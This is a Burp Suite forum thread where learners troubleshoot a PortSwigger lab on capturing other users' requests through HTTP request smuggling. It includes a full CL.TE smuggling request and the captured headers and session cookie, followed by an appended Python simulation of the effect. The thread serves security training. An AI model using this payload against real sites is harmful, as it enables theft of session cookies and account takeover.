Burp Suite User Forum


Exploiting HTTP request smuggling to capture other users' requests

Rajathi | Last updated: Mar 12, 2021 04:34AM UTC

Hi, I am doing the PortSwigger lab exercises, and there is one lab I am unable to solve. I followed all the steps as given in the solution. I can reach all the steps but the lab is not solved. If anybody is aware of this lab, please advise on this. The lab link is given below. https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests Thanks

Rajathi | Last updated: Mar 12, 2021 11:37AM UTC

Hi, can I have any solution for the above-mentioned lab? Thanks

Michelle, PortSwigger Agent | Last updated: Mar 12, 2021 11:58AM UTC

Thanks for your message. You might find this video from one of our other users helpful, it goes through the various steps to complete the lab: https://www.youtube.com/watch?v=v0jWcPEjNXI Have another try and see how you get on. Good luck :-)

Rajathi | Last updated: Mar 12, 2021 03:32PM UTC

Hi Michelle, Thanks for the reply. I watched the video already; it shows the different cookie session in that lab. https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests In this lab it shows the same cookie in all the proxy URLs. Looking forward to your solution. Thank you so much.

Rajathi | Last updated: Mar 13, 2021 11:15AM UTC

Hi, any solution for this issue? Thanks.

Michelle, PortSwigger Agent | Last updated: Mar 15, 2021 10:27AM UTC

Hi, do you see the comments on the blog post showing another user's request?

Michael | Last updated: Aug 05, 2021 05:53AM UTC

I'm experiencing the same issue. Always getting the same cookie as the one used on smuggled request on stored requests. When I try to use it in login post, always responds as NOT SOLVED.

Michelle, PortSwigger Agent | Last updated: Aug 05, 2021 07:35AM UTC

Thanks for your message. Can you tell us a bit more about the steps you have taken to get to this point, please? Do you see a blog post with a comment including a user's request? If you follow along with the community video solution, does that help? This is a lab where you might need to repeat the attack a few times before it's successful as the target user only browses the website intermittently, if you repeat the test a few more times, do you see anything different?

Bryan | Last updated: Sep 13, 2021 06:41AM UTC

I am also having the same issue. The cookie returned is the same as the one submitted in the smuggled request. I've tried doing it multiple times already, over a span of 3 days. Content-Length is capped at 808, with the end of the cookie returned in the comments section as "Connection: close". Is this a glitch on the lab itself? Or is there a workaround for it?

Michelle, PortSwigger Agent | Last updated: Sep 13, 2021 01:50PM UTC

Thanks for your message. The victim doesn't visit the page constantly so you might need to send the request a few times before you get a result other than seeing your own cookie. We have tested the lab and we can see blog posts that show the victim's cookie but we did have to send the requests a few times. I'd also maybe suggest using a slightly shorter content-length, maybe start at around 700 and slowly increase from there. Good luck, don't give up, you will crack it :-)

Priyanka | Last updated: Dec 31, 2021 07:13AM UTC

Hi @Michelle, This is my request:

    POST / HTTP/1.1
    Host: acc91f4d1faf6485c0b70322000b009b.web-security-academy.net
    Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 211
    Transfer-encoding: chunked

    0

    POST /post/comment HTTP/1.1
    Content-Length: 600
    Content-Type: application/x-www-form-urlencoded

    csrf=0acHrE7Vw4H9S4DGK3JRjnOWFUM72zfo&postId=9&name=test+4&email=test%40check.com&website=&comment=check3

and the blogpost comment is this:

    check3GET /post?postId=9 HTTP/1.1
    Host: acc91f4d1faf6485c0b70322000b009b.web-security-academy.net
    Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU
    Cache-Control: max-age=0
    Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "macOS"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://acc91f4d1faf6485c0b70322000b009b.web-security-academy.net/post/comment/confirmation?postId=9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,e

As you see here, the session cookie in the blogpost is my own cookie. I am not getting the victim's cookie.

Michelle, PortSwigger Agent | Last updated: Jan 04, 2022 11:25AM UTC

Every few POST requests that you make to the lab, the victim user will make their own request. You might need to repeat your attack a few times to ensure that the victim user's request occurs as required. This lab is currently passing our tests so can you try it again and let us know if you are still encountering issues?

Shaden | Last updated: Mar 08, 2022 11:21AM UTC

Hi, I'm getting a different issue after taking the victim cookie in the blog. I tried to log in with the cookie, but it's not working, and I got this message every time: "Invalid CSRF token (session does not contain a CSRF token)."

Michelle, PortSwigger Agent | Last updated: Mar 08, 2022 02:37PM UTC

Thanks for getting in touch. Can you send some screenshots to support@portswigger.net showing the steps you're taking when you see this message, please?

Dawid | Last updated: Dec 19, 2022 04:21PM UTC

Same issue here. I'm only seeing my own cookie.

Michelle, PortSwigger Agent | Last updated: Dec 19, 2022 04:35PM UTC

Hi, what content length are you using in the request you're sending from Repeater? If you alter this and then increase it slowly, does this help?
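The symptoms reported in this thread (the stored comment showing your own cookie, and the effect of the smuggled Content-Length), modelled offline as an added example that is not part of any post or of the lab. The host name, session values and headers are constructed placeholders, and `backend_body` is a simplified, assumed model of a back end that trusts Content-Length.

```python
import re

# Constructed body of the smuggled comment request; `comment` is the last parameter.
PREFIX_BODY = b"csrf=TOKEN&postId=9&name=test&email=a%40b.example&website=&comment=check3"

def following_request(session: str) -> bytes:
    """Constructed stand-in for whichever request reaches the back end next."""
    return (
        "GET /post?postId=9 HTTP/1.1\r\n"
        "Host: lab.example\r\n"
        f"Cookie: session={session}\r\n"
        "User-Agent: constructed-sample\r\n"
        "\r\n"
    ).encode()

def backend_body(content_length: int, following: bytes):
    """Model the back end reading `content_length` body bytes.

    The bytes come first from the smuggled body, then from the next request
    on the same connection. Returns (body, complete).
    """
    body = (PREFIX_BODY + following)[:content_length]
    return body, len(body) == content_length

def stored_comment(content_length: int, following: bytes):
    """Comment text the application would store, or None if the body never completes."""
    body, complete = backend_body(content_length, following)
    if not complete:
        # Too few bytes arrived: a real server keeps waiting and eventually times out.
        return None
    return body.partition(b"comment=")[2].decode()

def session_in(comment):
    """Extract the session value visible in a stored comment (may be cut short)."""
    match = re.search(r"session=(\w+)", comment or "")
    return match.group(1) if match else None

if __name__ == "__main__":
    own = following_request("ownSession111")      # the sender's own next request
    other = following_request("otherUser222")     # another user's request
    for label, nxt, length in [("own request follows", own, 160),
                               ("other user follows", other, 160),
                               ("length too large", other, 808)]:
        print(label, "->", session_in(stored_comment(length, nxt)))
```

Whose cookie appears depends only on which request arrives next on the connection, and a Content-Length larger than the bytes that arrive leaves the request incomplete, so nothing is stored.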
